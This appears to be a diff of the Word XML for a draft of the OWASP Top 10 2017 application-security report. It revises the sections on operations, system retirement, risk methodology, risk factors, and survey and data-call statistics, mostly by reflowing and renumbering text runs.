-      <w:bookmarkStart w:id="132" w:name="deployment-testing-and-rollout"/>
+      <w:bookmarkStart w:id="132" w:name="operating-and-changes"/>
       <w:bookmarkEnd w:id="132"/>
       <w:r>
-        <w:t>Depl</w:t>
-      </w:r>
-      <w:r>
-        <w:t>oyment, Testing and Rollout</w:t>
+        <w:t>Operating and Changes</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t>To ensur</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e secure operations and changes, the following should be performed:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13246,7 +13326,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>It's critical that security tasks automated the secure setup of the application, interfaces and of all further components needed, including required authorizations</w:t>
+        <w:t>Operating including the security management for the application (e.g. patch management).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13258,11 +13338,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>Test the technical functions and integration to the IT architect</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ure, and coordinate business tests. Create "use" and "abuse" test cases from technical and business perspectives.</w:t>
+        <w:t>Raise the security awareness of users and manage conflicts about usability vs security.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13274,10 +13350,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Manage security tests according to internal processes, the protection needs and the level of security where the application is going to be dep</w:t>
-      </w:r>
-      <w:r>
-        <w:t>loyed</w:t>
+        <w:t>Plan and manage changes, e.g. migrate to new versions of the application or other components like OS, middleware and libraries.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13289,29 +13362,28 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Put the application in operation and migrate from previously used applications</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="68"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Finalize all documentation, including the CMDB and security architecture</w:t>
+        <w:t>Update all documentation, including in CMDB and the security architecture, controls, and countermeasures, including any runbooks</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> or project documentation.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="133" w:name="operating-and-changes"/>
+      <w:bookmarkStart w:id="133" w:name="retiring-systems"/>
       <w:bookmarkEnd w:id="133"/>
       <w:r>
-        <w:t>Operating and Changes</w:t>
+        <w:t>Retiring Systems</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t>The process of retiring systems is often overlooked. You should ensure that:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13323,10 +13395,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Operating including the security management for the application (e.g. patch </w:t>
-      </w:r>
-      <w:r>
-        <w:t>management)</w:t>
+        <w:t>Any required data is archived. All other data is securely wiped.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13338,7 +13407,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Regularly report all users and authorizations to the application owner and get them acknowledged</w:t>
+        <w:t>Securely close down the application, including deleting unused account</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s and roles and permissions.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13350,104 +13422,28 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Raise the security awareness of users and manage conflicts about usability vs security</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="69"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Plan and manage changes, e.g. migrate to new versions of the application or other components like OS, middleware and libraries</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="69"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Update all documentation, including in CMDB and the security architecture, controls, and countermeasures, including any runbooks </w:t>
-      </w:r>
-      <w:r>
-        <w:t>or project documentation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="134" w:name="retiring-systems"/>
+        <w:t>Set your application’s state to retired in the CMDB.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="134" w:name="r-note-about-risks"/>
+      <w:bookmarkStart w:id="135" w:name="_Toc496914312"/>
       <w:bookmarkEnd w:id="134"/>
-      <w:r>
-        <w:t>Retiring Systems</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="70"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Implement business requirements for data retention (deletion) policies and securely archiving data</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="70"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Securely close down the application, including deleting unused accounts and roles and permissions</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="70"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Set your applicat</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ion's state to retired in the CMDB</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="135" w:name="r-note-about-risks"/>
-      <w:bookmarkStart w:id="136" w:name="_Toc496719119"/>
-      <w:bookmarkEnd w:id="135"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>+R Note About Risks</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="135"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="136" w:name="its-about-risks-not-weaknesses"/>
       <w:bookmarkEnd w:id="136"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="137" w:name="its-about-risks-not-weaknesses"/>
-      <w:bookmarkEnd w:id="137"/>
       <w:r>
         <w:t>It's About Risks, Not Weaknesses</w:t>
       </w:r>
@@ -13459,33 +13455,55 @@
       <w:r>
         <w:t xml:space="preserve">Although the </w:t>
       </w:r>
+      <w:hyperlink r:id="rId208">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP Top 10 2007</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> and earlier versions of the Top 1</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">0 focused on identifying the most prevalent "vulnerabilities," the OWASP Top 10 has always been organized around risks. This focus on risks has caused some understandable confusion on the part of people searching for an airtight weakness taxonomy. The </w:t>
+      </w:r>
       <w:hyperlink r:id="rId209">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Top 10 2007</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> and earlier versions of the Top 10 focused on identifying the most prevalent "vu</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">lnerabilities," the OWASP Top 10 has always been organized around risks. This focus on risks has caused some understandable confusion on the part of people searching for an airtight weakness taxonomy. The </w:t>
+          <w:t>OWASP Top 10 for 2010</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> clarified the risk-focus in the Top 10 by being very explicit about how threat agents, attack vectors, weaknesses, technical impacts, and business impacts combine to produce r</w:t>
+      </w:r>
+      <w:r>
+        <w:t>isks. This version of the OWASP Top 10 continues to follow the same methodology.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The Risk Rating methodology for the Top 10 is based on the </w:t>
       </w:r>
       <w:hyperlink r:id="rId210">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Top 10 for 2010</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>clarified the risk-focus in the Top 10 by being very explicit about how threat agents, attack vectors, weaknesses, technical impacts, and business impacts combine to produce risks. This version of the OWASP Top 10 continues to follow the same methodology.</w:t>
+          <w:t>OWASP Risk Rating Methodology</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>. For each Top 10 item, we estimated the typical risk that each weakness introduces to a typical web application by looking at common likelihood factors and impact factors for each common weakness. We then rank ordered the Top 10 according to those weaknes</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ses that typically introduce the most significant risk to an application. These factors get updated with each new Top 10 release as things change.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13493,24 +13511,27 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The Risk Rating methodology for the Top 10 is based on the </w:t>
+        <w:t xml:space="preserve">The </w:t>
       </w:r>
       <w:hyperlink r:id="rId211">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Risk Rating Methodology</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve">. For each Top 10 item, we estimated the typical risk that each weakness introduces to </w:t>
-      </w:r>
-      <w:r>
-        <w:t>a typical web application by looking at common likelihood factors and impact factors for each common weakness. We then rank ordered the Top 10 according to those weaknesses that typically introduce the most significant risk to an application. These factors</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> get updated with each new Top 10 release as things change.</w:t>
+          <w:t>OWASP Risk Rating Method</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>ology</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> defines numerous factors to help calculate the risk of an identified vulnerability. However, the Top 10 must talk about generalities, rather than specific vulnerabilities in real applications and APIs. Consequently, we can never be as precise as syst</w:t>
+      </w:r>
+      <w:r>
+        <w:t>em owners can be when calculating risks for their application(s). You are best equipped to judge the importance of your applications and data, what your threats are, and how your system has been built and is being operated.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13518,24 +13539,19 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId212">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>OWASP Risk Rating Methodology</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> defines numerous factors to help calculate the risk of an identified vulnerabilit</w:t>
-      </w:r>
-      <w:r>
-        <w:t>y. However, the Top 10 must talk about generalities, rather than specific vulnerabilities in real applications and APIs. Consequently, we can never be as precise as system owners can be when calculating risks for their application(s). You are best equipped</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> to judge the importance of your applications and data, what your threats are, and how your system has been built and is being operated.</w:t>
+        <w:t>Our methodology includes three l</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ikelihood factors for each weakness (prevalence, detectability, and ease of exploit) and one impact factor (technical impact). The prevalence of a weakness is a factor that you typically don't have to calculate. For prevalence data, we have been supplied p</w:t>
+      </w:r>
+      <w:r>
+        <w:t>revalence statistics from a number of different organizations (as referenced in the Attribution section on page 4) and we have averaged their data together to come up with a Top 10 likelihood of existence list by prevalence. This data was then combined wit</w:t>
+      </w:r>
+      <w:r>
+        <w:t>h the other two likelihood factors (detectability and ease of exploit) to calculate a likelihood rating for each weakness. The likelihood rating was then multiplied by our estimated average technical impact for each item to come up with an overall risk ran</w:t>
+      </w:r>
+      <w:r>
+        <w:t>king for each item in the Top 10 (the higher the result the higher the risk).  </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13543,30 +13559,10 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>Our methodology includes three likelihood factors for each weakness (prevalence, detectability, and ease of exploit) an</w:t>
-      </w:r>
-      <w:r>
-        <w:t>d one impact factor (technical impact). The prevalence of a weakness is a factor that you typically don't have to calculate. For prevalence data, we have been supplied prevalence statistics from a number of different organizations (as referenced in the Att</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ribution section on page 4) and we have averaged their data together to come up with a Top 10 likelihood of existence list by prevalence. This data was then combined with the other two likelihood factors (detectability and ease of exploit) to calculate a l</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ikelihood rating for each weakness. The likelihood rating was then multiplied by our estimated average technical impact for each item to come up with an overall risk ranking for each item in the Top 10 (the higher the result the higher the risk).  </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Note th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>at this approach does not take the likelihood of the threat agent into account. Nor does it account for any of the various technical details associated with your particular application. Any of these factors could significantly affect the overall likelihood</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> of an attacker finding and exploiting a particular vulnerability. This rating does not take into account the actual impact on your business. </w:t>
+        <w:t>Note that this approach does not take the likelihood of the threat agent into account. Nor does it account for any of the various technical details associated with your particu</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">lar application. Any of these factors could significantly affect the overall likelihood of an attacker finding and exploiting a particular vulnerability. This rating does not take into account the actual impact on your business. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13575,7 +13571,10 @@
         <w:t>Your organization</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> will have to decide how much security risk from applications and APIs the </w:t>
+        <w:t xml:space="preserve"> will have</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to decide how much security risk from applications and APIs the </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13584,10 +13583,7 @@
         <w:t>organization</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> is willin</w:t>
-      </w:r>
-      <w:r>
-        <w:t>g to accept given your culture, industry, and regulatory environment. The purpose of the OWASP Top 10 is not to do this risk analysis for you.</w:t>
+        <w:t xml:space="preserve"> is willing to accept given your culture, industry, and regulatory environment. The purpose of the OWASP Top 10 is not to do this risk analysis for you.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13595,7 +13591,10 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The following illustrates our calculation of the risk for </w:t>
+        <w:t xml:space="preserve">The following illustrates </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">our calculation of the risk for </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13632,7 +13631,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId213"/>
+                    <a:blip r:embed="rId212"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -13663,24 +13662,21 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="138" w:name="rf-details-about-risk-factors"/>
-      <w:bookmarkStart w:id="139" w:name="_Toc496719120"/>
+      <w:bookmarkStart w:id="137" w:name="rf-details-about-risk-factors"/>
+      <w:bookmarkStart w:id="138" w:name="_Toc496914313"/>
+      <w:bookmarkEnd w:id="137"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>+RF Details About Risk Factors</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="138"/>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">+RF Details About </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Risk Factors</w:t>
-      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="139" w:name="top-10-risk-factor-summary"/>
       <w:bookmarkEnd w:id="139"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="140" w:name="top-10-risk-factor-summary"/>
-      <w:bookmarkEnd w:id="140"/>
       <w:r>
         <w:t>Top 10 Risk Factor Summary</w:t>
       </w:r>
@@ -13690,22 +13686,25 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>The following table presents a summary of the 2017 Top 10 Application Security Risks, and the risk factors we have assigned to each risk. These factors were determined based on the available statistics and the experi</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ence of the OWASP Top 10 team. To understand these risks for a particular application or organization, </w:t>
+        <w:t>The following table presents a summary of the 2017 Top 10 Application Security Risks, and the risk factors we have assigned to ea</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ch risk. These factors were determined based on the available statistics and the experience of the OWASP Top 10 team. To understand these risks for a particular application or organization, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
         </w:rPr>
-        <w:t>you must consider your own specific threat agents and business impacts</w:t>
-      </w:r>
-      <w:r>
-        <w:t>. Even severe software weaknesses may not present a serious risk if there are no th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>reat agents in a position to perform the necessary attack or the business impact is negligible for the assets involved.</w:t>
+        <w:t>you must consider your own specific threat agents and business imp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>acts</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Even severe software weaknesses may not present a serious risk if there are no threat agents in a position to perform the necessary attack or the business impact is negligible for the assets involved.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13732,7 +13731,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId214"/>
+                    <a:blip r:embed="rId213"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -13763,60 +13762,60 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="141" w:name="additional-risks-to-consider"/>
+      <w:bookmarkStart w:id="140" w:name="additional-risks-to-consider"/>
+      <w:bookmarkEnd w:id="140"/>
+      <w:r>
+        <w:t>Additional Risks To Consider</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The Top 10 covers </w:t>
+      </w:r>
+      <w:r>
+        <w:t>a lot of ground, but there are many other risks you should consider and evaluate in your organization. Some of these have appeared in previous versions of the Top 10, and others have not, including new attack techniques that are being identified all the ti</w:t>
+      </w:r>
+      <w:r>
+        <w:t>me.  Other important application security risks (in alphabetical order) that you should additionally consider include:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="70"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>TBD - GOLDEN MASTER</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="141" w:name="dat-methodology-and-data"/>
+      <w:bookmarkStart w:id="142" w:name="_Toc496914314"/>
       <w:bookmarkEnd w:id="141"/>
-      <w:r>
-        <w:t>Additional Risks To Consider</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t>The Top 10 covers a lot of ground, but there are many other risks you should consider and evaluate in you</w:t>
-      </w:r>
-      <w:r>
-        <w:t>r organization. Some of these have appeared in previous versions of the Top 10, and others have not, including new attack techniques that are being identified all the time.  Other important application security risks (in alphabetical order) that you should</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> additionally consider include:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="71"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>TBD - GOLDEN MASTER</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="142" w:name="dat-methodology-and-data"/>
-      <w:bookmarkStart w:id="143" w:name="_Toc496719121"/>
-      <w:bookmarkEnd w:id="142"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>+Dat Methodology and Data</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="143"/>
+      <w:bookmarkEnd w:id="142"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>At the OWASP Project Summit, active participants and community members decided on a vulnerability view, with up to two (2) forward looking vulnerability classes, with ordering de</w:t>
-      </w:r>
-      <w:r>
-        <w:t>fined partially by quantitative data, and partially by qualitative surveys.</w:t>
+        <w:t>At the OWASP Project Summit, active participants and community members decided on a vulnera</w:t>
+      </w:r>
+      <w:r>
+        <w:t>bility view, with up to two (2) forward looking vulnerability classes, with ordering defined partially by quantitative data, and partially by qualitative surveys.</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -13827,8 +13826,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="144" w:name="industry-ranked-survey"/>
-      <w:bookmarkEnd w:id="144"/>
+      <w:bookmarkStart w:id="143" w:name="industry-ranked-survey"/>
+      <w:bookmarkEnd w:id="143"/>
       <w:r>
         <w:t>Industry Ranked Survey</w:t>
       </w:r>
@@ -13838,13 +13837,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">For the survey, we collected the vulnerability categories that had been previously identified as being "on the cusp" or were mentioned in feedback to 2017 </w:t>
-      </w:r>
-      <w:r>
-        <w:t>RC1 on the Top 10 mailing list. We put them into a ranked survey and asked respondents to rank the top four vulnerabilities that they felt should be included in the OWASP Top 10 2017. The survey was open from Aug 2 - Sep 18, 2017. 516 responses were collec</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ted and the vulnerabilities were ranked.</w:t>
+        <w:t>For the survey, we collected the vulnerability categories that had been previously identified as being "on the cusp" or were mentioned in feedback to 2017 RC1 on the Top 10 mailing list. We put them into a ranked survey and asked respondents to rank the to</w:t>
+      </w:r>
+      <w:r>
+        <w:t>p four vulnerabilities that they felt should be included in the OWASP Top 10 2017. The survey was open from Aug 2 - Sep 18, 2017. 516 responses were collected and the vulnerabilities were ranked.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -13933,7 +13929,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Exposure of Private Information ('Privacy Violation') [CWE-359]</w:t>
+              <w:t>Exposure of Pr</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ivate Information ('Privacy Violation') [CWE-359]</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14130,10 +14129,10 @@
         <w:t>A3:2017-Sensitive Data Exposure</w:t>
       </w:r>
       <w:r>
-        <w:t>. Cryptographic Failures can fit within Sensitive Data Exposure. Insecure deserial</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ization was ranked at number three, so it was added to the Top 10 as </w:t>
+        <w:t>. Cryptographic Failu</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">res can fit within Sensitive Data Exposure. Insecure deserialization was ranked at number three, so it was added to the Top 10 as </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14151,116 +14150,113 @@
         <w:t>A5:2017-Broken Access Control</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">; it is good to see it rank highly on the survey, as </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">there is not much data relating to authorization vulnerabilities. The number five ranked category in the survey is Insufficient Logging and Monitoring, which we believe is a good fit for the Top 10 list, which is why it has become </w:t>
+        <w:t xml:space="preserve">; it is good to see it rank highly on the survey, as there is not much data relating to authorization vulnerabilities. The number five ranked category in the survey is Insufficient Logging and Monitoring, which we believe is a </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">good fit for the Top 10 list, which is why it has become </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>A10:2017-Insufficient Log</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>ging and Monitoring</w:t>
-      </w:r>
-      <w:r>
-        <w:t>. We have moved to a point where applications need to be able to define what may be an attack and generate appropriate logging, alerting, escalation and response. </w:t>
+        <w:t>A10:2017-Insufficient Logging and Monitoring</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. We have moved to a point where applications need to be able to define what may be an attack and generate appropriate logging, alerting, escalation and re</w:t>
+      </w:r>
+      <w:r>
+        <w:t>sponse. </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="145" w:name="public-data-call"/>
+      <w:bookmarkStart w:id="144" w:name="public-data-call"/>
+      <w:bookmarkEnd w:id="144"/>
+      <w:r>
+        <w:t>Public Data Call</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Traditionally, the data collected and analyzed was more along the lines of frequency data; how many vulnerabilities found in tested applications. As is well known, tools traditionally report all instances found of a vulnerability </w:t>
+      </w:r>
+      <w:r>
+        <w:t>and humans traditionally report a single finding with a number of examples. This makes it very difficult to aggregate the two styles of reporting in a comparable manner.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t>For 2017, the incidence rate was calculated by how many applications in a given data s</w:t>
+      </w:r>
+      <w:r>
+        <w:t>et had one or more of a specific vulnerability type. The data from many larger contributors was provided in two views: The first was the traditional frequency style of counting every instance found of a vulnerability, the second was the count of applicatio</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ns that each vulnerability was found in (one or more time). While not perfect, this reasonably allows us to compare the data from Human Assisted Tools and Tool Assisted Humans. The raw data and </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">analysis work is </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId214">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>available in GitHub</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>. We intend to expand on this with additional structure for 2020 (or earlier).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t>We received 40+ submissions in the call for data, as many were from the original data call that was focused on frequency, we we</w:t>
+      </w:r>
+      <w:r>
+        <w:t>re able to use data from 23 contributors covering ~114,000 applications. We used a one year block of time where possible and identified by the contributor. The majority of applications are unique, though we acknowledge the likelihood of some repeat applica</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">tions between the yearly data from Veracode. The 23 datasets used were either identified as tool assisted human testing or specifically provided incidence rate from human assisted tools. Anomalies in the selected data of 100%+ incidence were adjusted down </w:t>
+      </w:r>
+      <w:r>
+        <w:t>to 100% max. To calculate the incidence rate, we calculated the percentage of the total applications there were found to contain each vulnerability type. The ranking of incidence was used for the prevalence calculation in the overall risk for ranking the T</w:t>
+      </w:r>
+      <w:r>
+        <w:t>op 10. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="145" w:name="acknowledgements"/>
